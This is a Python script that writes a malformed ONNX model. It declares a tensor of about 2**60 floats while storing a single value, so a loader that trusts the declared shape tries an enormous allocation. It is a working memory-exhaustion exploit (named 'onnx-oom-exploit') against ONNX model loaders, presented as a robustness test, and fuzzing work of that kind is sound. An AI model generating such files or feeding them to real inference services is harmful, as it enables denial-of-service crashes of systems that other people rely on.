import struct

import onnx
from onnx import TensorProto, helper
|
|
def create_oom_onnx(output_path, dims=None):
    """Write an ONNX model whose initializer declares enormous dimensions.

    The initializer's declared shape (default ``2**30 x 2**30`` elements,
    ~2**60 floats) vastly exceeds the single float value actually serialized,
    so any loader that eagerly allocates memory from the declared dims will
    attempt a multi-exabyte allocation. Intended for testing loader
    robustness against malformed models.

    Args:
        output_path: Filesystem path the serialized model is written to.
        dims: Optional list of declared initializer dimensions. Defaults to
            ``[1024**3, 1024**3]`` for backward compatibility.
    """
    print("[*] Creating ONNX model with huge initializer dimensions...")

    if dims is None:
        dims = [1024 * 1024 * 1024, 1024 * 1024 * 1024]

    # raw=False stores `vals` verbatim, so only one float is serialized
    # despite the declared dims claiming ~2**60 elements.
    initializer = helper.make_tensor(
        name="huge_tensor",
        data_type=TensorProto.FLOAT,
        dims=dims,
        vals=[1.0],
        raw=False,
    )

    node_def = helper.make_node("Identity", ["huge_tensor"], ["output"])
    graph_def = helper.make_graph(
        [node_def],
        "oom-graph",
        [],  # no graph inputs: the initializer feeds the Identity node directly
        [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])],
        initializer=[initializer],
    )

    model_def = helper.make_model(
        graph_def,
        producer_name="onnx-oom-exploit",
        opset_imports=[onnx.helper.make_opsetid("ai.onnx", 19)],
    )
    onnx.save(model_def, output_path)
    print(f"[+] Model saved to {output_path}")
|
|
if __name__ == "__main__":
    # Default drop location for the generated test model.
    target_path = "/tmp/oom.onnx"
    create_oom_onnx(target_path)
|
|